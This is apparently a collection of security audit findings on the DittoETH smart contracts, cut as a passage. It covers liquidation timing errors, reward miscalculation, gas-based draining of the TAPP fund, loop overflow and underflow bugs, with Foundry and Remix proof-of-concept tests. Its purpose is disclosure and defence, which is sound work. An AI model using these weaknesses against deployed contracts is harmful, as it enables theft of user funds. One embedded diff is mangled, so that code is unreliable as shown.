_updateOracleAndStartingShort(address asset, uint16[] memory shortHintArray)\\n 813 private\\n 814 {\\n 815 AppStorage storage s = appStorage();\\n 815 uint256 oraclePrice = LibOracle.getOraclePrice(asset);\\n \\n // rest of code// rest of code\\n // rest of code// rest of code\\n // rest of code// rest of code\\n\\n 845 //@dev: force hint to be within 1% of oracleprice\\n 846 bool startingShortWithinOracleRange = shortPrice\\n 847 <= oraclePrice.mul(1.01 ether) // @audit-issue : division before multiplication\\n 848 && s.shorts[asset][prevId].price >= oraclePrice;\\n \\n // rest of code// rest of code\\n // rest of code// rest of code\\n // rest of code// rest of code\\n\\n 866 }\\n```\\n\\n\\nThe effective calculation being done above is:\\n```\\n (oracleN / oracleD) * (1.01 ether) // division before multiplication\\n```\\n\\n\\nWhich should have been:\\n```\\n (oracleN * 1.01 ether) / oracle\\n```\\n\\n\\nSimilar multiplication or division operations have been done on `price` at various places throughout the code, which can be clubbed under this root cause itself.ч```\\nuint256 cRatio = short.getCollateralRatioSpotPrice(LibOracle.getSavedOrSpotOraclePrice(asset));\\n```\\n -Primary short liquidation can not be completed in the last hour of the liquidation timelineчmediumчShorts flagged for liquidation can not be liquidated in the last and final hour of the liquidation timeline, resulting in the liquidation flag being reset and requiring the short to be flagged again.\\nIf a short's collateral ratio is below the primary liquidation threshold (determined by the `LibAsset.primaryLiquidationCR` function, by default set to 400%), anyone can flag the position for liquidation by calling the `MarginCallPrimaryFacet.flagShort` function.\\nSubsequently, the short position owner has a certain amount of time, specifically, `10 hours` (configured and determined by the `LibAsset.firstLiquidationTime` function), to repay the loan and bring the collateral ratio back above the primary liquidation threshold. If the short position owner fails to do so, the short position can be liquidated by calling the `MarginCallPrimaryFacet.liquidate` function.\\nThe specific criteria for the liquidation eligibility are defined and determined in the `MarginCallPrimaryFacet._canLiquidate` function.\\ncontracts/facets/MarginCallPrimaryFacet.sol#L387\\n```\\nfunction _canLiquidate(MTypes.MarginCallPrimary memory m)\\n private\\n view\\n returns (bool)\\n{\\n// rest of code // [// rest of code]\\n uint256 timeDiff = LibOrders.getOffsetTimeHours() - m.short.updatedAt;\\n uint256 resetLiquidationTime = LibAsset.resetLiquidationTime(m.asset);\\n❌ if (timeDiff >= resetLiquidationTime) {\\n return false;\\n } else {\\n uint256 secondLiquidationTime = LibAsset.secondLiquidationTime(m.asset);\\n bool isBetweenFirstAndSecondLiquidationTime = timeDiff\\n > LibAsset.firstLiquidationTime(m.asset) && timeDiff <= secondLiquidationTime\\n && s.flagMapping[m.short.flaggerId] == msg.sender;\\n bool isBetweenSecondAndResetLiquidationTime =\\n timeDiff > secondLiquidationTime && timeDiff <= resetLiquidationTime;\\n if (\\n !(\\n (isBetweenFirstAndSecondLiquidationTime)\\n || (isBetweenSecondAndResetLiquidationTime)\\n )\\n ) {\\n revert Errors.MarginCallIneligibleWindow();\\n }\\n return true;\\n }\\n}\\n```\\n\\nThis function checks in lines 387-389 if the elapsed time (timeDiff) since the short was updated is equal or greater than the reset liquidation time (resetLiquidationTime), which is by default set to `16 hours`. In this case, the short position has not been liquidated in time and has to be flagged again.\\nHowever, this condition conflicts with the `isBetweenSecondAndResetLiquidationTime` criteria in lines 394-395, specifically, the `timeDiff` <= `resetLiquidationTime` check. If the `timeDiff` value is equal to `resetLiquidationTime`, both conditions, in line 387 as well as the check in line 395, are `true`. Due to line 387 taking precedence, the liquidation is considered outdated and the short position has to be flagged again.\\nBased on the check in lines 67-69 of the `flagShort` function, it is evident that a short position flagged for liquidation requires re-flagging only if the `timeDiff` value is greater (>) than the reset liquidation time (resetLiquidationTime):\\ncontracts/facets/MarginCallPrimaryFacet.sol#L67-L69\\n```\\nif (timeDiff <= resetLiquidationTime) {\\n revert Errors.MarginCallAlreadyFlagged();\\n}\\n```\\n\\nThus, the check in line 387 is incorrect, leading to prematurely resetting the short's liquidation flagging status.\\nAs the timestamps are in `hours`, and the liquidation timeline is relatively short, having an off-by-one error in the liquidation timeline can lead to a significant impact on the liquidations. Concretely, attempting to liquidate a short position in the last hour of the timeline, i.e., `timeDiff = 16`, is not possible.чConsider using `>` instead of `>=` in line 387 to prevent the liquidation timeline from overlapping with the bounds check in line 395.чч```\\nfunction _canLiquidate(MTypes.MarginCallPrimary memory m)\\n private\\n view\\n returns (bool)\\n{\\n// rest of code // [// rest of code]\\n uint256 timeDiff = LibOrders.getOffsetTimeHours() - m.short.updatedAt;\\n uint256 resetLiquidationTime = LibAsset.resetLiquidationTime(m.asset);\\n❌ if (timeDiff >= resetLiquidationTime) {\\n return false;\\n } else {\\n uint256 secondLiquidationTime = LibAsset.secondLiquidationTime(m.asset);\\n bool isBetweenFirstAndSecondLiquidationTime = timeDiff\\n > LibAsset.firstLiquidationTime(m.asset) && timeDiff <= secondLiquidationTime\\n && s.flagMapping[m.short.flaggerId] == msg.sender;\\n bool isBetweenSecondAndResetLiquidationTime =\\n timeDiff > secondLiquidationTime && timeDiff <= resetLiquidationTime;\\n if (\\n !(\\n (isBetweenFirstAndSecondLiquidationTime)\\n || (isBetweenSecondAndResetLiquidationTime)\\n )\\n ) {\\n revert Errors.MarginCallIneligibleWindow();\\n }\\n return true;\\n }\\n}\\n```\\n -Changes in `dittoShorterRate` affect retroactively to accrued Ditto yield sharesчlowчThe calculation of the Ditto rewards earned by shorters does not take into account that the changes in the Ditto shorter rate will impact retroactively, inflating or deflating the new Ditto rewards of the users.\\n`YieldFacet.sol:distributeYield()` calculates and credits ZETH and Ditto rewards earned from short records by `msg.sender`. The distribution of the rewards is performed in the `_claimYield()` function:\\n```\\n125 // Credit ZETH and Ditto rewards earned from shortRecords from all markets\\n126 function _claimYield(uint256 vault, uint88 yield, uint256 dittoYieldShares) private {\\n127 STypes.Vault storage Vault = s.vault[vault];\\n128 STypes.VaultUser storage VaultUser = s.vaultUser[vault][msg.sender];\\n129 // Implicitly checks for a valid vault\\n130 if (yield <= 1) revert Errors.NoYield();\\n131 // Credit yield to ethEscrowed\\n132 VaultUser.ethEscrowed += yield;\\n133 // Ditto rewards earned for all shorters since inception\\n134 uint256 protocolTime = LibOrders.getOffsetTime();\\n135 uint256 dittoRewardShortersTotal = Vault.dittoShorterRate * protocolTime;\\n136 // Ditto reward proportion from this yield distribution\\n137 uint256 dittoYieldSharesTotal = Vault.zethCollateralReward;\\n138 uint256 dittoReward =\\n139 dittoYieldShares.mul(dittoRewardShortersTotal).div(dittoYieldSharesTotal);\\n140 // Credit ditto reward to user\\n141 if (dittoReward > type(uint80).max) revert Errors.InvalidAmount();\\n142 VaultUser.dittoReward += uint80(dittoReward);\\n143 }\\n```\\n\\nFocusing on the Ditto rewards, we can see that the function receives the number of yield shares earned by the user (dittoYieldShares) and in line 138 calculates the Ditto reward by multiplying this amount by the total amount of rewards of the protocol (dittoRewardShortersTotal) and dividing it by the total amount of yield shares of the protocol (dittoYieldSharesTotal).\\nIf we take a look in line 135 at how the `dittoRewardShortersTotal` is calculated, we can see that it is the product of the Ditto shorter rate and total time elapsed since the protocol deployment.\\nThis last calculation is wrong, as it is assumed that the Ditto shorter rate is constant, but this parameter can be changed by the admin or the DAO. This means that the changes in the Ditto shorter rate will impact retroactively, inflating or deflating the new Ditto rewards of the users. Also, users that have yielded the same number of shares during the same period, will receive different rewards depending on whether they claim their rewards before or after the Ditto shorter rate change.\\nAdd the following code snippet into `test/Yield.t.sol` and run `forge test --mt testYieldRateChange`.\\n```\\n function testYieldRateChange() public {\\n address alice = makeAddr(\"alice\");\\n address bob = makeAddr(\"bob\");\\n address[] memory assets = new address[](1);\\n assets[0] = asset;\\n\\n fundLimitBid(DEFAULT_PRICE, 320000 ether, receiver);\\n fundLimitShort(DEFAULT_PRICE, 80000 ether, alice);\\n fundLimitShort(DEFAULT_PRICE, 80000 ether, bob);\\n generateYield();\\n skip(yieldEligibleTime);\\n\\n // Alice and Bob have the same number of Ditto yield shares\\n assertEq(diamond.getDittoMatchedReward(vault, alice), diamond.getDittoMatchedReward(vault, alice));\\n\\n // Alice's yield is distributed\\n vm.prank(alice);\\n diamond.distributeYield(assets);\\n\\n // Ditto shorter rate is updated\\n vm.prank(owner);\\n diamond.setDittoShorterRate(vault, 2);\\n\\n // Bob's yield is distributed\\n vm.prank(bob);\\n diamond.distributeYield(assets);\\n\\n uint256 aliceDittoRewards = diamond.getDittoReward(vault, alice);\\n uint256 bobDittoRewards = diamond.getDittoReward(vault, bob);\\n\\n // Bob receives more Ditto rewards than Alice, even both were entitled to the same amount\\n assertApproxEqAbs(aliceDittoRewards * 2, bobDittoRewards, 2);\\n }\\n```\\nчCreate two new state variables that keep track of the timestamp of the last Ditto shorter rate update and the total Ditto rewards accrued at that time. Then the calculation of `dittoRewardShortersTotal` would be:\\n```\\n uint256 dittoRewardShortersTotal = lastSnapshotRewards + Vault.dittoShorterRate * (protocolTime - lastSnapshotTimestamp);\\n```\\nчChanges in the Ditto shorter rate will impact retroactively, inflating or deflating the new Ditto rewards of the users. Users might not be incentivized to claim their rewards, as they might receive more rewards if they wait for the Ditto shorter rate to change.ч```\\n125 // Credit ZETH and Ditto rewards earned from shortRecords from all markets\\n126 function _claimYield(uint256 vault, uint88 yield, uint256 dittoYieldShares) private {\\n127 STypes.Vault storage Vault = s.vault[vault];\\n128 STypes.VaultUser storage VaultUser = s.vaultUser[vault][msg.sender];\\n129 // Implicitly checks for a valid vault\\n130 if (yield <= 1) revert Errors.NoYield();\\n131 // Credit yield to ethEscrowed\\n132 VaultUser.ethEscrowed += yield;\\n133 // Ditto rewards earned for all shorters since inception\\n134 uint256 protocolTime = LibOrders.getOffsetTime();\\n135 uint256 dittoRewardShortersTotal = Vault.dittoShorterRate * protocolTime;\\n136 // Ditto reward proportion from this yield distribution\\n137 uint256 dittoYieldSharesTotal = Vault.zethCollateralReward;\\n138 uint256 dittoReward =\\n139 dittoYieldShares.mul(dittoRewardShortersTotal).div(dittoYieldSharesTotal);\\n140 // Credit ditto reward to user\\n141 if (dittoReward > type(uint80).max) revert Errors.InvalidAmount();\\n142 VaultUser.dittoReward += uint80(dittoReward);\\n143 }\\n```\\n -Margin callers can drain the TAPP during liquidation by willingly increase gas costs with the shortHintArrayчhighчDuring primary liquidation the TAPP (Treasury Asset Protection Pool) pays the gas costs of force bids, so that margin callers are even motivated to liquidate shorters, if gas costs are high. To liquidate a shortRecord margin, callers must provide a parameter called shortHintArray to the function call. The purpose of this array is to save gas, it should contain id hints where the protocol should look for shorts in the order book which are currently above the oracle price, since users can't match against shorts under the oracle price. As the protocol loops through this shortHintArray, an array with wrong hints could increase gas and as the length of the array is never checked, it could even increase the gas costs to an amount that would fully drain the TAPP. As the TAPP is an important security mechanism of the protocol, draining the funds of it could lead to a shutdown of the market and therefore to a big loss of user funds.\\nThe liquidate function takes the shortHintArray as parameter:\\n```\\nfunction liquidate(\\n address asset,\\n address shorter,\\n uint8 id,\\n uint16[] memory shortHintArray\\n)\\n external\\n isNotFrozen(asset)\\n nonReentrant\\n onlyValidShortRecord(asset, shorter, id)\\n returns (uint88, uint88)\\n{\\n// rest of code\\n}\\n```\\n\\nThis array is then used to create a forceBid:\\n```\\n(m.ethFilled, ercAmountLeft) = IDiamond(payable(address(this))).createForcedBid(\\n address(this), m.asset, _bidPrice, m.short.ercDebt, shortHintArray\\n);\\n```\\n\\nAnd during these process, the protocol loops over this array:\\n```\\nfunction _updateOracleAndStartingShort(address asset, uint16[] memory shortHintArray)\\n private\\n{\\n // rest of code\\n uint16 shortHintId;\\n for (uint256 i = 0; i < shortHintArray.length;) {\\n shortHintId = shortHintArray[i];\\n unchecked {\\n ++i;\\n }\\n\\n {\\n O shortOrderType = s.shorts[asset][shortHintId].orderType;\\n if (\\n shortOrderType == O.Cancelled || shortOrderType == O.Matched\\n || shortOrderType == O.Uninitialized\\n ) {\\n continue;\\n }\\n }\\n // rest of code\\n}\\n```\\n\\nIn the end, the TAPP pays for the gas costs in the _marginFeeHandler function:\\n```\\nfunction _marginFeeHandler(MTypes.MarginCallPrimary memory m) private {\\n STypes.VaultUser storage VaultUser = s.vaultUser[m.vault][msg.sender];\\n STypes.VaultUser storage TAPP = s.vaultUser[m.vault][address(this)];\\n // distribute fees to TAPP and caller\\n uint88 tappFee = m.ethFilled.mulU88(m.tappFeePct);\\n uint88 callerFee = m.ethFilled.mulU88(m.callerFeePct) + m.gasFee;\\n\\n m.totalFee += tappFee + callerFee;\\n //@dev TAPP already received the gasFee for being the forcedBid caller. tappFee nets out.\\n if (TAPP.ethEscrowed >= callerFee) {\\n TAPP.ethEscrowed -= callerFee;\\n VaultUser.ethEscrowed += callerFee;\\n } else {\\n // Give caller (portion of?) tappFee instead of gasFee\\n VaultUser.ethEscrowed += callerFee - m.gasFee + tappFee;\\n m.totalFee -= m.gasFee;\\n TAPP.ethEscrowed -= m.totalFee;\\n }\\n}\\n```\\n\\nTherefore, if the user provides a big shortHintArray with wrong hints the gas costs will drastically increase to a point which drains the funds of the TAPP.чCheck the length of the shortHintArray.чAs the TAPP does no longer has enough funds to pay for liquidation, if shortRecords are under collateralized. A lot of problems like the increment of the ercDebtRate and the shutdown of the market can occur. This leads to a big loss of user funds.ч```\\nfunction liquidate(\\n address asset,\\n address shorter,\\n uint8 id,\\n uint16[] memory shortHintArray\\n)\\n external\\n isNotFrozen(asset)\\n nonReentrant\\n onlyValidShortRecord(asset, shorter, id)\\n returns (uint88, uint88)\\n{\\n// rest of code\\n}\\n```\\n -The protocol allows less flags to be generated than possible which could lead to a DoS of the primary liquidation processчlowчThe maximum flags (for liquidation) that can exist at the same time should be limited by the maximum number, of flaggerIdCounter which is a uint24, but it is limited by the maximum number of a uint16 instead. Therefore, a maximum of 65535 shortRecords can be flagged for liquidation at the same time. This is way too less if the protocol is used a lot and a market goes up in price, and would therefore lead to a DoS of the liquidation process.\\nThe maximum of the flaggerIdCounter and therefore the maximum of flags that can exist at the same time is limited by the maximum number of a uint24:\\n```\\nuint24 flaggerIdCounter;\\n```\\n\\nIf there are no flags left to override the system tries to generate a new flagId, but it does not use the maximum number of uint24, it uses the maximum number of uint16 instead, which is 65535:\\n```\\n} else if (s.flaggerIdCounter < type(uint16).max) {\\n //@dev generate brand new flaggerId\\n short.flaggerId = flagStorage.g_flaggerId = s.flaggerIdCounter;\\n s.flaggerIdCounter++;\\n} else {\\n revert Errors.InvalidFlaggerHint();\\n}\\n```\\n\\nThis could be way to less if the protocol is used a lot and the price of a market goes up. Therefore it would prevent creating new flaggerIds and shortRecords with unhealthy CR can not be liquidated.чSet the check to type(uint24).max.чDoS of the liquidation process, which could potentially lead to a lot of shortRecords with unhealthy CR, which could in the worst case lead to the situation that assets are no longer backed enough, and the market needs to be shut down. This would result in a big loss of user funds.ч```\\nuint24 flaggerIdCounter;\\n```\\n -Infinite loop breaks protocol functionality.чlowчProtocol documentation says that DAO is able to cancel up to 1,000 orders when order count is above 65,000. However, because of the faulty `for loop` it is impossible to cancel more than 255 orders.\\nVulnerability details\\n`orderId` is implemented in protocol to index orders in orderbook. In the protocol documentation it is written that it can handle above 65,000 orders because of reusable orderIds. When there are more than 65,500 orders DAO can cancel up to 1,000 orders. Here are the code blocks from `cancelOrderFarFromOracle` function which allows DAO to cancel orders. It also allows user to cancel one order.\\nIt makes sure that there are more than 65,000 orders.\\n```\\n if (s.asset[asset].orderId < 65000) {\\n revert Errors.OrderIdCountTooLow();\\n }\\n```\\n\\nThis ensures that DAO can't cancel more than 1,000 orders.\\n```\\n if (numOrdersToCancel > 1000) {\\n revert Errors.CannotCancelMoreThan1000Orders();\\n }\\n```\\n\\nLater `cancelOrderFarFromOracle` checks if `msg.sender == LibDiamond.diamondStorage().contractOwner` and based on the boolean value (true or false) of this statement it allows to cancel the desired amount of orders.\\nThe problem occurs in `cancelManyOrders` (LibOrders.sol) which is called on the mapping of orders of specified earlier `orderType`.\\n```\\nfunction cancelManyOrders(\\n mapping(address => mapping(uint16 => STypes.Order)) storage orders,\\n address asset,\\n uint16 lastOrderId,\\n uint16 numOrdersToCancel\\n ) internal {\\n uint16 prevId;\\n uint16 currentId = lastOrderId;\\n for (uint8 i; i < numOrdersToCancel;) {\\n prevId = orders[asset][currentId].prevId;\\n LibOrders.cancelOrder(orders, asset, currentId);\\n currentId = prevId;\\n unchecked {\\n ++i;\\n }\\n }\\n }\\n \\n```\\n\\nThis function receives parameters:\\nmapping of orders to cancel\\naddress of asset (market that will be impacted)\\nlast order id\\nnumber of orders to cancel\\nWhen we look at the implementation of this function we can see that `uint8` was used as a variable for the iteration in the `for loop`. `uint8` i maximum value is `255`. As we can see in the `for loop` there is `unchecked` statement which allows uint underflow / overflow.\\n```\\n unchecked {\\n ++i;\\n} \\n```\\n\\nSo when we try to add 1 to 255 (255 + 1) solidity would automaticly `revert` due to uint overflow but when we use `unchecked` solidity allows us to do this operation and the result of this will be `0`.\\nWhen DAO would like to cancel more than 255 orders it would result in infinite loop since:\\nthe for loop will iterate when `i` < numOrdersToCancel\\nthe vaule of `i` will always be less than 256 because it can't get bigger than that due to overflow\\n`i = 255` and `i < 256` `unchecked {++i;}` Next iteration `i = 0` and `i < 256` `unchecked {++i;}`\\nI created pretty simple PoC in Remix.\\n```\\n// SPDX-License-Identifier: MIT\\n\\npragma solidity 0.8.21;\\n\\n\\ncontract PoC {\\n\\n uint256 public iterationsCount;\\n\\n function infiniteForLoop(uint256 amountOfIterations) public {\\n for(uint8 i; i < amountOfIterations;) {\\n iterationsCount += 1;\\n unchecked {\\n ++i;\\n }\\n }\\n }\\n\\n}\\n```\\n\\nTo see that this function can't handle more than 255 orders cancelations run this function with input parameter (amountOfItertions) equal to 256 or above.\\nFurther explenation\\nAfter DAO tries to cancel more than 255 orders the infinite loop will be created which will terminate the transaction.\\nThe transaction will fail because of gas consumption. For loop will run as many times as it can with provided gas. Since it will try to run infinitely it will run out of gas.чTo solve this problem change `uint8 i` to `uint16` or any higher uint that can handle the desired amount of iterations.чProtocol documentation states that DAO is able to cancel 1,000 orders. Since it is not possible with the current implementation of the code this issue disrupts protocols functionality. The implemented code can't handle desired functionality.\\nTools used\\nVScode, Manual Review, Remixч```\\n if (s.asset[asset].orderId < 65000) {\\n revert Errors.OrderIdCountTooLow();\\n }\\n```\\n -Order creation can run out of gas since relying on previous order matchtypeчmediumчIf the hint order id has been reused and the previous order type is `matched` the current code iterates from the head of the linked list under the assumption that `since the previous order has been `matched` it must have been at the top of the orderbook which would mean the new order with a similar price would also be somewhere near the top of the orderbook`.\\n```\\n function findOrderHintId(\\n mapping(address => mapping(uint16 => STypes.Order)) storage orders,\\n address asset,\\n MTypes.OrderHint[] memory orderHintArray\\n ) internal returns (uint16 hintId) {\\n\\n // more code\\n\\n // @audit if a reused order's prevOrderType is matched, returns HEAD\\n\\n if (hintOrderType == O.Cancelled || hintOrderType == O.Matched) {\\n emit Events.FindOrderHintId(0);\\n continue;\\n } else if (\\n orders[asset][orderHint.hintId].creationTime == orderHint.creationTime\\n ) {\\n emit Events.FindOrderHintId(1);\\n return orderHint.hintId;\\n } else if (orders[asset][orderHint.hintId].prevOrderType == O.Matched) {\\n //@dev If hint was prev matched, it means that the hint was close to HEAD and therefore is reasonable to use HEAD\\n emit Events.FindOrderHintId(2);\\n return Constants.HEAD;\\n }\\n```\\n\\nhttps://github.com/Cyfrin/2023-09-ditto/blob/a93b4276420a092913f43169a353a6198d3c21b9/contracts/libraries/LibOrders.sol#L927-L947\\nBut it is possible that the initial order was cancelled and the id reused multiple times with the previous order being close to the market price resulting in a match. This can lead to a possible exhaustion of gas if the user's order has a price far from the top of the orderbook.\\nExample scenario\\nCurrent state of bids in orderbook:\\nTop bid 2000\\nTotal bids 1000\\nBids ids are from 100 to 999. No order is cancelled and reusable.\\nA user wants to bid at 1700 which would be the 800th order pricewise.\\nUser calls `createBid` passing in `[799,798]` for the orderHintArray.\\nThe following tx's occur in the same block before the user's `createBid` call in the following order.\\nOrder id `799` gets cancelled.\\nAnother user creates a limit order at `2001` which now has order id `799` since it is reused.\\nA market/new limit ask order fills the bid.\\nAnother user creates a limit order at price `1800`.\\nIn `createBid` when finding the hint id, the condition `prevOrderType == O.Matched` will pass and the hintId returned will be the `HEAD`.\\nThe loop starts to check for the price match from `HEAD` and exhausts gas before iterating over 800 bids.чI think the probability of the above scenario is higher than that of multiple user's cancelling their orders. Hence moving to the next hint order as soon as the current hint order has been found to be reused could be better and will cost less gas on error.чOrder creation can run out-of-gas on particular flow\\nTest Code\\nAdd the following change in test/AskSellOrders.t.sol and run\\n```\\ndiff // Remove the line below\\n// Remove the line below\\ngit a/test/AskSellOrders.t.sol b/test/AskSellOrders.t.sol\\nindex 4e8a4a9..264ea32 100644\\n// Remove the line below\\n// Remove the line below\\n// Remove the line below\\n a/test/AskSellOrders.t.sol\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/test/AskSellOrders.t.sol\\n@@ // Remove the line below\\n8,7 // Add the line below\\n8,7 @@ import {Errors} from \"contracts/libraries/Errors.sol\";\\n import {STypes, MTypes, O} from \"contracts/libraries/DataTypes.sol\";\\n \\n import {OBFixture} from \"test/utils/OBFixture.sol\";\\n// Remove the line below\\n// import {console} from \"contracts/libraries/console.sol\";\\n// Add the line below\\nimport {console} from \"contracts/libraries/console.sol\";\\n \\n contract SellOrdersTest is OBFixture {\\n using U256 for uint256;\\n@@ // Remove the line below\\n59,6 // Add the line below\\n59,49 @@ contract SellOrdersTest is OBFixture {\\n assertEq(asks[0].price, DEFAULT_PRICE);\\n }\\n \\n// Add the line below\\n function testPossibleOutOfGasInLoopDueToHighIterations() public {\\n// Add the line below\\n for (uint256 i = 0; i < 1000; i// Add the line below\\n// Add the line below\\n) {\\n// Add the line below\\n fundLimitAskOpt(DEFAULT_PRICE, DEFAULT_AMOUNT, sender);\\n// Add the line below\\n }\\n// Add the line below\\n\\n// Add the line below\\n // a new order at the bottom of the order book\\n// Add the line below\\n fundLimitAskOpt(HIGHER_PRICE, DEFAULT_AMOUNT, sender);\\n// Add the line below\\n assertTrue(getAsks()[1000].price == HIGHER_PRICE);\\n// Add the line below\\n assertTrue(getAsks()[1000].ercAmount == DEFAULT_AMOUNT);\\n// Add the line below\\n\\n// Add the line below\\n // user wants to create an order at HIGHER_PRICE\\n// Add the line below\\n MTypes.OrderHint[] memory orderHintArray =\\n// Add the line below\\n diamond.getHintArray(asset, HIGHER_PRICE, O.LimitAsk);\\n// Add the line below\\n uint16 targetOrderId = orderHintArray[0].hintId;\\n// Add the line below\\n assertTrue(targetOrderId == getAsks()[1000].id);\\n// Add the line below\\n\\n// Add the line below\\n // the target order gets cancelled\\n// Add the line below\\n vm.prank(sender);\\n// Add the line below\\n cancelAsk(targetOrderId);\\n// Add the line below\\n\\n// Add the line below\\n // a person creates a limit ask which reuses the cancelled order id\\n// Add the line below\\n fundLimitAskOpt(LOWER_PRICE, DEFAULT_AMOUNT, sender);\\n// Add the line below\\n assertTrue(getAsks()[0].id == targetOrderId);\\n// Add the line below\\n\\n// Add the line below\\n // a bid matches the targetId\\n// Add the line below\\n fundLimitBid(LOWER_PRICE, DEFAULT_AMOUNT, receiver);\\n// Add the line below\\n\\n// Add the line below\\n // another person creates a limit ask which reuses the matched order id\\n// Add the line below\\n fundLimitAskOpt(LOWER_PRICE, DEFAULT_AMOUNT, sender);\\n// Add the line below\\n assertTrue(getAsks()[0].id == targetOrderId);\\n// Add the line below\\n\\n// Add the line below\\n // the tx of the user goes through\\n// Add the line below\\n depositUsd(sender, DEFAULT_AMOUNT);\\n// Add the line below\\n vm.prank(sender);\\n// Add the line below\\n uint256 gasStart = gasleft();\\n// Add the line below\\n diamond.createAsk(\\n// Add the line below\\n asset, HIGHER_PRICE, DEFAULT_AMOUNT, Constants.LIMIT_ORDER, orderHintArray\\n// Add the line below\\n );\\n// Add the line below\\n uint256 gasUsed = gasStart // Remove the line below\\n gasleft();\\n// Add the line below\\n assertGt(gasUsed, 2_000_000);\\n// Add the line below\\n console.log(gasUsed);\\n// Add the line below\\n }\\n// Add the line below\\n\\n function testAddingLimitSellAskUsdGreaterThanBidUsd() public {\\n fundLimitBidOpt(DEFAULT_PRICE, DEFAULT_AMOUNT, receiver);\\n fundLimitAskOpt(DEFAULT_PRICE, DEFAULT_AMOUNT * 2, sender);\\n```\\nч```\\n function findOrderHintId(\\n mapping(address => mapping(uint16 => STypes.Order)) storage orders,\\n address asset,\\n MTypes.OrderHint[] memory orderHintArray\\n ) internal returns (uint16 hintId) {\\n\\n // more code\\n\\n // @audit if a reused order's prevOrderType is matched, returns HEAD\\n\\n if (hintOrderType == O.Cancelled || hintOrderType == O.Matched) {\\n emit Events.FindOrderHintId(0);\\n continue;\\n } else if (\\n orders[asset][orderHint.hintId].creationTime == orderHint.creationTime\\n ) {\\n emit Events.FindOrderHintId(1);\\n return orderHint.hintId;\\n } else if (orders[asset][orderHint.hintId].prevOrderType == O.Matched) {\\n //@dev If hint was prev matched, it means that the hint was close to HEAD and therefore is reasonable to use HEAD\\n emit Events.FindOrderHintId(2);\\n return Constants.HEAD;\\n }\\n```\\n -Secondary short liquidation reverts due to arithmetic underflow in volatile market conditionsчmediumчThe `ercDebtAtOraclePrice` is calculated based on the cached Oracle price, which is not updated with the retrieved, potentially fresh spot price due to the 15-minute staleness limit at the beginning of the secondary liquidation call. This results in the `ercDebtAtOraclePrice` being greater than the short's available collateral, resulting in an underflow error when attempting to subtract the calculated `ercDebtAtOraclePrice` from the `m.short.collateral`.\\nShorts with a collateral ratio below `secondaryLiquidationCR`, i.e., 150% by default, can be liquidated in batches via the secondary liquidation mechanism, executed via the `MarginCallSecondaryFacet.liquidateSecondary` function.\\nAll shorts within the batch are iterated, and for each short, important values are kept in memory within the `MTypes.MarginCallSecondary` struct, evaluated in the `_setMarginCallStruct` function. The collateral ratio, `m.cRatio`, is calculated via the `LibShortRecord.getCollateralRatioSpotPrice` function, based on the given oracle price.\\nThe Oracle price is determined by the `LibOracle.getSavedOrSpotOraclePrice` function in line 47, which either returns the current spot price if the cached price is stale (older than 15 min) or the cached price.\\n```\\nfunction getSavedOrSpotOraclePrice(address asset) internal view returns (uint256) {\\n if (LibOrders.getOffsetTime() - getTime(asset) < 15 minutes) {\\n return getPrice(asset);\\n } else {\\n return getOraclePrice(asset);\\n }\\n}\\n```\\n\\nFurther on, the liquidation proceeds in the `_secondaryLiquidationHelper` function. If the short's `cRatio` is greater than 100% in line 166, the remaining collateral (i.e., the collateral minus the debt) is refunded. It is either refunded to the shorter if the `cRatio` is greater than 110% (m.minimumCR), or, otherwise, to the TAPP (address(this)).\\ncontracts/facets/MarginCallSecondaryFacet.sol#L177\\n```\\nfunction _secondaryLiquidationHelper(MTypes.MarginCallSecondary memory m) private {\\n // @dev when cRatio <= 1 liquidator eats loss, so it's expected that only TAPP would call\\n m.liquidatorCollateral = m.short.collateral;\\n if (m.cRatio > 1 ether) {\\n uint88 ercDebtAtOraclePrice =\\n m.short.ercDebt.mulU88(LibOracle.getPrice(m.asset)); // eth\\n m.liquidatorCollateral = ercDebtAtOraclePrice;\\n // if cRatio > 110%, shorter gets remaining collateral\\n // Otherwise they take a penalty, and remaining goes to the pool\\n address remainingCollateralAddress =\\n m.cRatio > m.minimumCR ? m.shorter : address(this);\\n s.vaultUser[m.vault][remainingCollateralAddress].ethEscrowed +=\\n❌ m.short.collateral - ercDebtAtOraclePrice;\\n }\\n LibShortRecord.disburseCollateral(\\n m.asset,\\n m.shorter,\\n m.short.collateral,\\n m.short.zethYieldRate,\\n m.short.updatedAt\\n );\\n LibShortRecord.deleteShortRecord(m.asset, m.shorter, m.short.id);\\n}\\n```\\n\\nThe value of the debt, `ercDebtAtOraclePrice`, is calculated based on the currently cached price, as the `LibOracle.getPrice` function returns the stored price.\\n[!NOTE] The initially retrieved Oracle price at the beginning of the liquidation call, returned by the `LibOracle.getSavedOrSpotOraclePrice` function, does not store the retrieved spot price in storage if the cached price is stale.\\nConsequently, there are potentially two different asset prices used. The asset's spot price and the cached, stale oracle price.\\nConsider the case where there is a significant difference between the spot price and the cached price. This would calculate the `m.cRatio` based on the spot price and the `ercDebtAtOraclePrice` based on the cached price.\\nThis is demonstrated in the following example:\\nConsider the following liquidateable short position (simplified, ignores decimal precision for this demonstration):\\nCollateral Debt Collateralization Ratio (based on spot price) Price ETH/USD Spot Price TOKEN/ETH Cached Price TOKEN/ETH\\n1 ETH 1400 TOKEN $${1 \\over {1400 * 0.0005}} \\approx 142\\%$$ 2000 0.0005 0.00075\\nCalculating the `ercDebtAtOraclePrice` with the cached oracle price `0.00075` for TOKEN/ETH, returned by the `LibOracle.getPrice` function, results in:\\n$$ \\begin{align} ercDebtAtOraclePrice &= debt \\cdot price \\ &= 1400 \\cdot 0.00075 \\ &= 1.05 \\text{ ETH} \\end{align} $$\\nThe resulting debt value, quoted in ETH, is `1.05 ETH`, which is larger than the short's available collateral, `m.short.collateral = 1 ETH`.\\nThis results in an arithmetic underflow error attempting to subtract the calculated `ercDebtAtOraclePrice` from `m.short.collateral` in line 177.\\nSpecifically, this scenario occurs in the following situation:\\nA user opens a short position with a collateral of $1 \\text{ ETH}$ and a debt of $1400 \\text{ TOKEN}$ at TOKEN/ETH price of $0.00014286 \\text{ ETH}$ -> Debt in ETH: $1400 * 0.00014286 = 0.2 \\text{ ETH}$ -> CR = $1/0.2 = 500\\%$\\nThe spot (oracle) price of TOKEN/ETH increases from $0.00014286 \\text{ ETH}$ to $0.00075 \\text{ ETH}$ -> Debt in ETH: $1400 * 0.00075 = 1.05 \\text{ ETH}$ -> CR = $1 / 1.05 \\approx 95\\%$ (eligible for secondary liquidation - also for primary liquidation due to < 110%)\\nNew orders for the TOKEN asset are added to the order book, leading to the oracle price being updated/cached to $0.00075 \\text{ ETH}$ per 